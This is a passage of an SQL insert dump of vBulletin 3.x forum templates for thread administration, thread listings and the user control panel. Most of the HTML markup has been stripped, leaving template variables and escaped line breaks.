(1661, -1, 'threadadmin_managepost', '\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n ', '\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n $vbphrase[info] \r\n \r\n\r\n \r\n \r\n $postinfo[postdate] $postinfo[posttime] \r\n \r\n $postinfo[username] \r\n \r\n \r\n\r\n $postinfo[pagetext] \r\n \r\n
\r\n\r\n ', 'template', 1208875790, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1662, -1, 'threadadmin_mergeposts', '\r\n\r\noptions[\'postminchars\'] . \")\\\"\") : (\"\")).\">\r\n\r\n $errorreview\r\n\r\n \r\n \r\n $vbphrase[merge_posts] \r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[options] \r\n\r\n \r\n\r\n
\r\n $vbphrase[thread]
\r\n
$titlebit
\r\n
\r\n\r\n \r\n\r\n \r\n
\r\n $vbphrase[post] \r\n \r\n $postlistbit\r\n \r\n
\r\n \r\n\r\n \r\n \".(($show[\'userchoice\']) ? (\"\r\n
\r\n $vbphrase[username] \r\n \r\n $usernamebit\r\n \r\n
\r\n \") : (\"\")).\"\r\n \r\n\r\n \r\n
\r\n $vbphrase[title] \r\n options[\'titlemaxchars\'] . \"\\\" tabindex=\\\"1\\\" title=\\\"$vbphrase[optional]\\\" value=\\\"$edit[title]\\\" />\r\n
\r\n \r\n\r\n \r\n
\r\n $vbphrase[reason] \r\n \r\n
\r\n \r\n\r\n
\r\n\r\n \r\n\r\n
\r\n $vbphrase[notes] \r\n \r\n
\" . construct_phrase(\"$vbphrase[merging_x_posts_from_y_threads_in_z_forums]\", \"$postcount\", \"$threadcount\", \"$forumcount\") . \"
\r\n
$vbphrase[you_must_have_the_required_permission]
\r\n
\r\n \r\n\r\n \r\n
$vbphrase[message]
\r\n\r\n $messagearea\r\n \r\n\r\n
\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n\r\n
\r\n\r\n
\r\n
\r\n \r\n \r\n \r\n
\r\n\r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n ', '\r\n\r\n onsubmit=\"return vB_Editor[\'$editorid\'].prepare_submit(0, $vboptions[postminchars])\">\r\n\r\n $errorreview\r\n\r\n \r\n \r\n $vbphrase[merge_posts] \r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[options] \r\n\r\n \r\n\r\n
\r\n $vbphrase[thread]
\r\n
$titlebit
\r\n
\r\n\r\n \r\n\r\n \r\n
\r\n $vbphrase[post] \r\n \r\n $postlistbit\r\n \r\n
\r\n \r\n\r\n \r\n
\r\n \r\n $vbphrase[username] \r\n \r\n $usernamebit\r\n \r\n
\r\n \r\n \r\n\r\n \r\n
\r\n $vbphrase[title] \r\n \r\n
\r\n \r\n\r\n \r\n
\r\n $vbphrase[reason] \r\n \r\n
\r\n \r\n\r\n
\r\n\r\n \r\n\r\n
\r\n $vbphrase[notes] \r\n \r\n
$vbphrase[merging_x_posts_from_y_threads_in_z_forums] \r\n
$vbphrase[you_must_have_the_required_permission]
\r\n
\r\n \r\n\r\n \r\n
$vbphrase[message]
\r\n\r\n $messagearea\r\n \r\n\r\n
\r\n \r\n \r\n \r\n \r\n \r\n\r\n
\r\n\r\n
\r\n
\r\n \r\n \r\n \r\n
\r\n\r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n ', 'template', 1213021539, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1663, -1, 'threadadmin_mergethread', '\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n\r\n\r\n\r\n ', '\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n ', 'template', 1208875747, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1664, -1, 'threadadmin_mergethreads', '\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n\".(($show[\'skipclearlist\']) ? (\"\r\n \r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n $vbphrase[merge_threads] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[options] \r\n\r\n \r\n\r\n
\r\n $vbphrase[destination_thread] \r\n \r\n $movethreadbits\r\n \r\n
\r\n\r\n
$vbphrase[destination_forum] \r\n \r\n $moveforumbits\r\n \r\n
\r\n\r\n
\r\n \r\n\r\n \".(($pollbits) ? (\"\r\n
\r\n $vbphrase[polls] \r\n\r\n \r\n\r\n
\r\n $vbphrase[thread_contain_one_poll] \r\n \r\n $pollbits\r\n \r\n
\r\n\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n
\r\n $vbphrase[redirect] \r\n\r\n \r\n\r\n \r\n\r\n
\r\n $vbphrase[notes] \r\n\r\n \r\n\r\n
\" . construct_phrase(\"$vbphrase[merging_x_threads_from_y_forums]\", \"$threadcount\", \"$forumcount\") . \"
\r\n
$vbphrase[thread_redirects_can_not_be_merged]
\r\n
$vbphrase[you_must_have_the_required_permission]
\r\n\r\n
\r\n\r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n ', '\r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[merge_threads] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[options] \r\n\r\n \r\n\r\n
\r\n $vbphrase[destination_thread] \r\n \r\n $movethreadbits\r\n \r\n
\r\n\r\n
$vbphrase[destination_forum] \r\n \r\n $moveforumbits\r\n \r\n
\r\n\r\n
\r\n \r\n\r\n
\r\n \r\n $vbphrase[polls] \r\n\r\n \r\n\r\n
\r\n $vbphrase[thread_contain_one_poll] \r\n \r\n $pollbits\r\n \r\n
\r\n\r\n
\r\n \r\n \r\n\r\n
\r\n $vbphrase[redirect] \r\n\r\n \r\n\r\n \r\n\r\n
\r\n $vbphrase[notes] \r\n\r\n \r\n\r\n
$vbphrase[merging_x_threads_from_y_forums] \r\n
$vbphrase[thread_redirects_can_not_be_merged]
\r\n
$vbphrase[you_must_have_the_required_permission]
\r\n\r\n
\r\n\r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n ', 'template', 1208875731, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1665, -1, 'threadadmin_moveposts', '\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[move_posts] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[move_posts_to_new_thread] \r\n \r\n \r\n\r\n
\r\n $vbphrase[move_posts_to_existing_thread] \r\n \r\n \r\n\r\n
\r\n $vbphrase[notes] \r\n \r\n
\" . construct_phrase(\"$vbphrase[moving_x_posts_from_y_threads_in_z_forums]\", \"$postcount\", \"$threadcount\", \"$forumcount\") . \"
\r\n
$vbphrase[you_must_have_the_required_permission]
\r\n
\r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n ', '\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[move_posts] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[move_posts_to_new_thread] \r\n \r\n \r\n\r\n
\r\n $vbphrase[move_posts_to_existing_thread] \r\n \r\n \r\n\r\n
\r\n $vbphrase[notes] \r\n \r\n
$vbphrase[moving_x_posts_from_y_threads_in_z_forums] \r\n
$vbphrase[you_must_have_the_required_permission]
\r\n
\r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n ', 'template', 1208875714, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1666, -1, 'threadadmin_movethread', '\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n\r\n\r\n\r\n \".(($show[\'move\']) ? (\"$vbphrase[move_thread]\") : (\"$vbphrase[copy_thread]\")).\" \r\n \r\n\r\n $vbphrase[title]: $threadinfo[prefix_plain_html] $threadinfo[title] \r\n \r\n\r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[new_subject] \r\n\r\n \r\n\r\n
\r\n $vbphrase[may_rename_thread] \r\n\r\n $vbphrase[new_subject]: \r\n options[\'titlemaxchars\'] . \"\\\" />\r\n\r\n
\r\n\r\n
\r\n \r\n\r\n
\r\n $vbphrase[destination_forum] \r\n\r\n \r\n\r\n
\r\n $vbphrase[destination_forum]: \r\n \r\n $moveforumbits\r\n \r\n
\r\n\r\n
\r\n \r\n\r\n \".(($show[\'move\']) ? (\"\r\n
\r\n $vbphrase[redirect] \r\n\r\n \r\n\r\n
\r\n\r\n
\r\n $vbphrase[redirect_title]: \r\n \".(($prefix_options) ? (\"\r\n \r\n $vbphrase[no_prefix_meta] \r\n $prefix_options\r\n \r\n \") : (\"\")).\"\r\n \r\n
\r\n\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n ', '\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[move_thread] $vbphrase[copy_thread] \r\n \r\n\r\n $vbphrase[title]: $threadinfo[prefix_plain_html] $threadinfo[title] \r\n \r\n\r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[new_subject] \r\n\r\n \r\n\r\n
\r\n $vbphrase[may_rename_thread] \r\n\r\n $vbphrase[new_subject]: \r\n \r\n\r\n
\r\n\r\n
\r\n \r\n\r\n
\r\n $vbphrase[destination_forum] \r\n\r\n \r\n\r\n
\r\n $vbphrase[destination_forum]: \r\n \r\n $moveforumbits\r\n \r\n
\r\n\r\n
\r\n \r\n\r\n
\r\n \r\n $vbphrase[redirect] \r\n\r\n \r\n\r\n
\r\n\r\n
\r\n $vbphrase[redirect_title]: \r\n \r\n \r\n $vbphrase[no_prefix_meta] \r\n $prefix_options\r\n \r\n \r\n \r\n
\r\n\r\n
\r\n \r\n \r\n\r\n
\r\n
\r\n\r\n \r\n $vbphrase[move_thread] $vbphrase[copy_thread]\" accesskey=\"s\" />\r\n \r\n
\r\n \r\n \r\n
\r\n\r\n ', 'template', 1208875549, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1667, -1, 'threadadmin_movethreads', '\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[move_threads] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n\r\n
\r\n $vbphrase[destination_forum] \r\n\r\n \r\n\r\n
\r\n $vbphrase[destination_forum]: \r\n \r\n $moveforumbits\r\n \r\n
\r\n\r\n
\r\n \r\n\r\n
\r\n $vbphrase[redirect] \r\n\r\n \r\n \r\n\r\n
\r\n $vbphrase[notes] \r\n\r\n \r\n
\" . construct_phrase(\"$vbphrase[moving_x_threads_from_y_forums]\", \"$threadcount\", \"$forumcount\") . \"
\r\n
$vbphrase[moving_moderated_and_soft_deleted_threads]
\r\n
$vbphrase[you_must_have_the_required_permission]
\r\n
\r\n\r\n\r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n ', '\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[move_threads] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n\r\n
\r\n $vbphrase[destination_forum] \r\n\r\n \r\n\r\n
\r\n $vbphrase[destination_forum]: \r\n \r\n $moveforumbits\r\n \r\n
\r\n\r\n
\r\n \r\n\r\n
\r\n $vbphrase[redirect] \r\n\r\n \r\n \r\n\r\n
\r\n $vbphrase[notes] \r\n\r\n \r\n
$vbphrase[moving_x_threads_from_y_forums] \r\n
$vbphrase[moving_moderated_and_soft_deleted_threads]
\r\n
$vbphrase[you_must_have_the_required_permission]
\r\n
\r\n\r\n\r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n ', 'template', 1208875535, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1668, -1, 'threadadmin_postbit', '\r\n', '\r\n', 'template', 1197524081, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1669, -1, 'threadbit', '\r\n \r\n $thread[openclose_editable]\r\n \r\n \r\n \".(($show[\'threadicons\']) ? (\"\r\n \".(($show[\'threadicon\']) ? (\" \") : (\" \")).\" \r\n \") : (\"\")).\"\r\n\r\n \r\n\r\n $thread[title_editable]\r\n \r\n\r\n \".(($show[\'rmanage\']) ? (\"\") : (\"\")).\"\r\n\r\n \r\n \".(($show[\'threadratings\'] AND $show[\'threadrating\']) ? (\"
\") : (\"\")).\"\r\n \".(($show[\'guestuser\']) ? (\"\r\n $thread[postusername]\r\n \") : (\"\r\n
session->vars[\'sessionurl\'] . \"u=$thread[postuserid]\', \'_self\')\\\">$thread[postusername] \r\n \")).\"\r\n
\r\n\r\n \".(($show[\'unsubscribe\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n\r\n \r\n\r\n \".(($show[\'threadmoved\']) ? (\"\r\n - \r\n \") : (\"\r\n \r\n \r\n \r\n \")).\"\r\n\r\n \".(($show[\'notificationtype\']) ? (\"\r\n \r\n $thread[notification] \r\n
\r\n \r\n \") : (\"\r\n \".(($show[\'threadmoved\']) ? (\"-\") : (\"$thread[replycount] \")).\" \r\n $thread[views] \r\n\r\n \".(($show[\'forumlink\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"f=$thread[forumid]\\\">$thread[forumtitle] \r\n \") : (\"\")).\"\r\n \")).\"\r\n\r\n \".(($show[\'inlinemod\']) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n ', '\r\n \r\n $thread[openclose_editable]\r\n $vbphrase[have_x_posts_in_thread_last_y] \" border=\"\" />\r\n \r\n \r\n \r\n \r\n\r\n \r\n\r\n $thread[title_editable]\r\n \r\n\r\n \r\n\r\n \r\n
$vbphrase[thread_rating_x_votes_y_average]\" />\r\n
\r\n $thread[postusername]\r\n \r\n $thread[postusername] \r\n \r\n
\r\n\r\n \r\n \r\n \r\n\r\n \r\n\r\n \r\n - \r\n \r\n $vbphrase[replies_x_views_y]\">\r\n \r\n $thread[lastpostdate]
$thread[lastposttime] \r\n
$vbphrase[by_x] \r\n
\r\n \r\n \r\n\r\n \r\n \r\n $thread[notification] \r\n
\r\n \r\n \r\n -$thread[replycount] \r\n $thread[views] \r\n\r\n \r\n $thread[forumtitle] \r\n \r\n \r\n\r\n \r\n alt2 alt1\">\r\n disabled=\"disabled\" />\r\n \r\n \r\n ', 'template', 1265297119, 'vBulletin Solutions', '3.8.5', 'vbulletin'),
(1670, -1, 'threadbit_announcement', '\r\n \r\n \r\n \r\n \r\n \r\n ', '\r\n \r\n \r\n \r\n \r\n \r\n ', 'template', 1179140698, 'vBulletin Solutions', '3.6.6', 'vbulletin'),
(1671, -1, 'threadbit_deleted', '\r\n \r\n\r\n \".(($show[\'threadicons\']) ? (\"\r\n \".(($show[\'threadicon\']) ? (\" \") : (\" \")).\" \r\n \") : (\"\")).\"\r\n\r\n \r\n\r\n \r\n\r\n \r\n \r\n\r\n \r\n \" . construct_phrase(\"$vbphrase[thread_deleted_by_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$thread[del_userid]\", \"$thread[del_username]\") . \"
\r\n \".(($show[\'deletereason\']) ? (\"\r\n $vbphrase[reason]: $thread[del_reason]
\r\n \") : (\"\")).\"\r\n \r\n\r\n \".(($show[\'forumlink\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"f=$thread[forumid]\\\">$thread[forumtitle] \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'inlinemod\']) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n ', '\r\n \r\n\r\n \r\n \r\n \r\n\r\n \r\n\r\n \r\n
$vbphrase[x_moderated_posts]\" /> \r\n
$vbphrase[x_deleted_posts]\" /> \r\n
$vbphrase[view] \r\n $thread[typeprefix]\r\n $thread[prefix_rich]\r\n
$thread[threadtitle] \r\n
\r\n\r\n \r\n
$vbphrase[manage] \r\n
\r\n $thread[postusername]\r\n \r\n $thread[postusername] \r\n \r\n
\r\n \r\n\r\n \r\n $vbphrase[thread_deleted_by_x] \r\n \r\n $vbphrase[reason]: $thread[del_reason]
\r\n \r\n \r\n\r\n \r\n $thread[forumtitle] \r\n \r\n\r\n \r\n \r\n disabled=\"disabled\" />\r\n \r\n \r\n ', 'template', 1189605879, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1672, -1, 'threadbit_lastvisit', '\r\n \".(($show[\'unread_posts\']) ? (\"$vbphrase[all_threads_below_here_unread]\") : (\"$vbphrase[all_threads_below_here]\")).\" \r\n ', '\r\n $vbphrase[all_threads_below_here_unread] $vbphrase[all_threads_below_here] \r\n ', 'template', 1149792167, 'vBulletin Solutions', '3.6.0 Beta 2', 'vbulletin'),
(1673, -1, 'threadbit_pagelink', '$curpage ', '&page=$curpage$address2\">$curpage ', 'template', 1127742889, 'vBulletin Solutions', '3.5.0', 'vbulletin'),
(1674, -1, 'USERCP', '$template_hook[usercp_main_pos1]\r\n\r\n\".(($show[\'pendingfriendrequests\'] OR $show[\'privatemessages\'] OR $show[\'newvisitormessages\'] OR $show[\'groupattention\'] OR $show[\'invitedgroups\'] OR $show[\'picture_comment_block\']) ? (\"\r\n\r\n \r\n\") : (\"\")).\"\r\n\r\n$template_hook[usercp_main_pos2]\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[new_subscribed_threads]: ($numthreads) \r\n \r\n \r\n \r\n\r\n \".(($show[\'threads\']) ? (\"\r\n \r\n\r\n \".(($show[\'threadicons\']) ? (\"\r\n \r\n \") : (\"\r\n \r\n \")).\"\r\n\r\n $vbphrase[thread] / $vbphrase[thread_starter] \r\n $vbphrase[last_post] \r\n $vbphrase[replies] \r\n $vbphrase[views] \r\n \r\n $threadbits\r\n \") : (\"\r\n \r\n $vbphrase[no_subscribed_threads_to_display] \r\n \r\n \")).\"\r\n \r\n \r\n \r\n \r\n
\r\n \r\n\r\n\r\n$template_hook[usercp_main_pos3]\r\n\r\n\".(($show[\'forums\']) ? (\"\r\n\r\n\r\n\r\n \r\n options[\'showmoderatorcolumn\']) ? (\"6\") : (\"5\")).\"\\\">\r\n \r\n $vbphrase[subscribed_forums]\r\n \r\n \r\n \r\n\r\n \r\n \r\n $vbphrase[forum] \r\n $vbphrase[last_post] \r\n $vbphrase[threads] \r\n $vbphrase[posts] \r\n \".(($GLOBALS[\'vbulletin\']->options[\'showmoderatorcolumn\']) ? (\"\r\n $vbphrase[moderator] \r\n \") : (\"\")).\"\r\n \r\n $forumbits\r\n \r\n
\r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'socialgroups\']) ? (\"\r\n\r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[subscribed_social_groups] : ($numsocialgroups) \r\n \r\n \r\n \r\n\r\n \r\n \r\n $vbphrase[group_name]\r\n \r\n \r\n $vbphrase[group_content]\r\n \r\n \r\n $vbphrase[last_post]\r\n \r\n \r\n $grouplist\r\n \r\n
\r\n \r\n\r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'discussions\']) ? (\"\r\n\r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[new_subscribed_discussions] : ($numdiscussions) \r\n \r\n \r\n \r\n\r\n\".((!$numdiscussions) ? (\"\r\n \r\n \r\n $vbphrase[no_subscribed_discussions_to_display] \r\n \r\n \r\n\") : (\"\r\n \r\n \r\n $vbphrase[discussion] \r\n $vbphrase[group_created] \r\n \r\n \r\n $vbphrase[messages]\r\n \r\n \r\n $vbphrase[last_post]\r\n \r\n \r\n $messagebits\r\n\")).\"\r\n \r\n \r\n \r\n \r\n \r\n\r\n
\r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n$template_hook[usercp_main_pos4]\r\n\r\n\".(($show[\'infractions\']) ? (\"\r\n\r\n\r\n\r\n \r\n \r\n \r\n \" . construct_phrase(\"$vbphrase[x_points_total]\", \"\" . $GLOBALS[\'vbulletin\']->userinfo[\'ipoints\'] . \"\") . \"\r\n \r\n \r\n \r\n $vbphrase[latest_infractions_received]\r\n \r\n \r\n \r\n\r\n \r\n \r\n $vbphrase[post] \r\n $vbphrase[date] \r\n $vbphrase[expires] \r\n $vbphrase[points] \r\n $vbphrase[reason] \r\n $vbphrase[posted_by] \r\n \r\n $infractionbits\r\n \r\n
\r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n$template_hook[usercp_main_pos5]\r\n\r\n\".(($show[\'reputation\']) ? (\"\r\n\r\n\r\n\r\n \r\n \r\n \r\n \" . construct_phrase(\"$vbphrase[x_points_total]\", \"\" . $GLOBALS[\'vbulletin\']->userinfo[\'reputation\'] . \"\") . \"\r\n \r\n \r\n \r\n $vbphrase[latest_reputation_received]\r\n \r\n \r\n \r\n\r\n \r\n \r\n $vbphrase[thread] \r\n $vbphrase[date] \r\n \".(($GLOBALS[\'vbulletin\']->options[\'showuserraters\']) ? (\"\r\n $vbphrase[posted_by] \r\n \") : (\"\")).\"\r\n $vbphrase[comment] \r\n \r\n $reputationcommentbits\r\n \r\n
\r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n$template_hook[usercp_main_pos6]\r\n\r\n\r\n\r\n \r\n $forumjump \r\n \r\n
', '$template_hook[usercp_main_pos1]\r\n\r\n\r\n\r\n \r\n \r\n\r\n$template_hook[usercp_main_pos2]\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[new_subscribed_threads]: ($numthreads) \r\n \r\n \r\n \r\n\r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n $vbphrase[thread] / $vbphrase[thread_starter] \r\n $vbphrase[last_post] \r\n $vbphrase[replies] \r\n $vbphrase[views] \r\n \r\n $threadbits\r\n \r\n \r\n $vbphrase[no_subscribed_threads_to_display] \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n \r\n\r\n\r\n$template_hook[usercp_main_pos3]\r\n\r\n\r\n\r\n\r\n\r\n \r\n 6 5\">\r\n \r\n $vbphrase[subscribed_forums]\r\n \r\n \r\n \r\n\r\n \r\n \r\n $vbphrase[forum] \r\n $vbphrase[last_post] \r\n $vbphrase[threads] \r\n $vbphrase[posts] \r\n \r\n $vbphrase[moderator] \r\n \r\n \r\n $forumbits\r\n \r\n
\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n \r\n 6 5\">\r\n \r\n $vbphrase[subscribed_social_groups] : ($numsocialgroups) \r\n \r\n \r\n \r\n\r\n \r\n \r\n $vbphrase[group_name]\r\n \r\n \r\n $vbphrase[group_content]\r\n \r\n \r\n $vbphrase[last_post]\r\n \r\n \r\n $grouplist\r\n \r\n
\r\n \r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[new_subscribed_discussions] : ($numdiscussions) \r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n $vbphrase[no_subscribed_discussions_to_display] \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[discussion] \r\n $vbphrase[group_created] \r\n \r\n \r\n $vbphrase[messages]\r\n \r\n \r\n $vbphrase[last_post]\r\n \r\n \r\n $messagebits\r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n
\r\n \r\n\r\n \r\n\r\n$template_hook[usercp_main_pos4]\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[x_points_total] \r\n \r\n \r\n \r\n $vbphrase[latest_infractions_received]\r\n \r\n \r\n \r\n\r\n \r\n \r\n $vbphrase[post] \r\n $vbphrase[date] \r\n $vbphrase[expires] \r\n $vbphrase[points] \r\n $vbphrase[reason] \r\n $vbphrase[posted_by] \r\n \r\n $infractionbits\r\n \r\n
\r\n \r\n\r\n \r\n\r\n$template_hook[usercp_main_pos5]\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[x_points_total] \r\n \r\n \r\n \r\n $vbphrase[latest_reputation_received]\r\n \r\n \r\n \r\n\r\n \r\n \r\n $vbphrase[thread] \r\n $vbphrase[date] \r\n \r\n $vbphrase[posted_by] \r\n \r\n $vbphrase[comment] \r\n \r\n $reputationcommentbits\r\n \r\n
\r\n \r\n\r\n \r\n\r\n$template_hook[usercp_main_pos6]\r\n\r\n\r\n\r\n \r\n $forumjump \r\n \r\n
', 'template', 1214929026, 'vBulletin Solutions', '3.7.1', 'vbulletin'),
(1675, -1, 'usercp_groupattentionbit', '$stylevar[dirmark]session->vars[\'sessionurl\'] . \"groupid=$group[groupid]&do=manage\\\">$group[name] ($group[moderatedmembers])', '$stylevar[dirmark]$group[name] ($group[moderatedmembers])', 'template', 1196869946, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1676, -1, 'usercp_groupinvitebit', 'session->vars[\'sessionurl\'] . \"groupid=$group[groupid]\\\">$group[name] ', '$group[name] ', 'template', 1196871699, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1677, -1, 'usercp_nav_folderbit', '\r\n \r\n ', '\r\n \r\n ', 'template', 1068353472, 'vBulletin Solutions', '', 'vbulletin'),
(1678, -1, 'usercp_newvisitormessagebit', '\r\n \r\n \r\n \r\n \r\n $visitormessage[formattedtime] \r\n $userbit\r\n
\r\n \r\n ', '\r\n \r\n \r\n \r\n \r\n $visitormessage[formattedtime] \r\n $userbit\r\n
\r\n \r\n ', 'template', 1197374794, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1679, -1, 'usercp_reputationbits', '\r\n \r\n \r\n \".(($reputation[\'title\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"p=$reputation[postid]#post$reputation[postid]\\\">$reputation[title] \r\n \") : (\"\r\n $vbphrase[n_a]\r\n \")).\"\r\n \r\n $reputation[dateline] $reputation[timeline] \r\n \".(($GLOBALS[\'vbulletin\']->options[\'showuserraters\']) ? (\"\r\n \r\n \".(($reputation[\'username\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"u=$reputation[whoadded]\\\">$reputation[username] \r\n \") : (\"\r\n $vbphrase[n_a]\r\n \")).\"\r\n \r\n \") : (\"\")).\"\r\n $reputation[reason] \r\n ', '\r\n \r\n \r\n \r\n $reputation[title] \r\n \r\n $vbphrase[n_a]\r\n \r\n \r\n $reputation[dateline] $reputation[timeline] \r\n \r\n \r\n \r\n $reputation[username] \r\n \r\n $vbphrase[n_a]\r\n \r\n \r\n \r\n $reputation[reason] \r\n ', 'template', 1232367782, 'vBulletin Solutions', '3.8.1', 'vbulletin'),
(1680, -1, 'USERCP_SHELL', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $pagetitle \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\".(($show[\'popups\'] AND $show[\'moderation\']) ? (\"\r\n\r\n\".(($show[\'deleteditems\']) ? (\"\r\n\r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'moderateditems\']) ? (\"\r\n\r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'newitems\']) ? (\"\r\n\r\n\r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n\") : (\"\")).\"\r\n \r\n \r\n \r\n\r\n\r\n\r\n$HTML\r\n\r\n\r\n \r\n \r\n
\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n $vboptions[bbtitle] - $pagetitle \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n$HTML\r\n\r\n\r\n \r\n \r\n
\r\n\r\n$footer\r\n\r\n', 'template', 1228217678, 'vBulletin Solutions', '3.8.0 Release Candidate 1', 'vbulletin'),
(1681, -1, 'userfield_checkbox_option', ' $val ', ' $val ', 'template', 1199994839, 'vBulletin Solutions', '3.7.0 Beta 4', 'vbulletin'),
(1682, -1, 'userfield_optional_input', '\r\n \".(($show[\'optionspage\']) ? (\"\r\n $vbphrase[or_enter_your_choice_here]: \r\n \") : (\"\r\n $vbphrase[or_enter_your_choice_here]: \r\n \")).\"\r\n ', '\r\n \r\n $vbphrase[or_enter_your_choice_here]: \r\n \r\n $vbphrase[or_enter_your_choice_here]: \r\n \r\n ', 'template', 1182960252, 'vBulletin Solutions', '3.6.8', 'vbulletin'),
(1683, -1, 'userfield_radio', '', '', 'template', 1199993518, 'vBulletin Solutions', '3.7.0 Beta 4', 'vbulletin'),
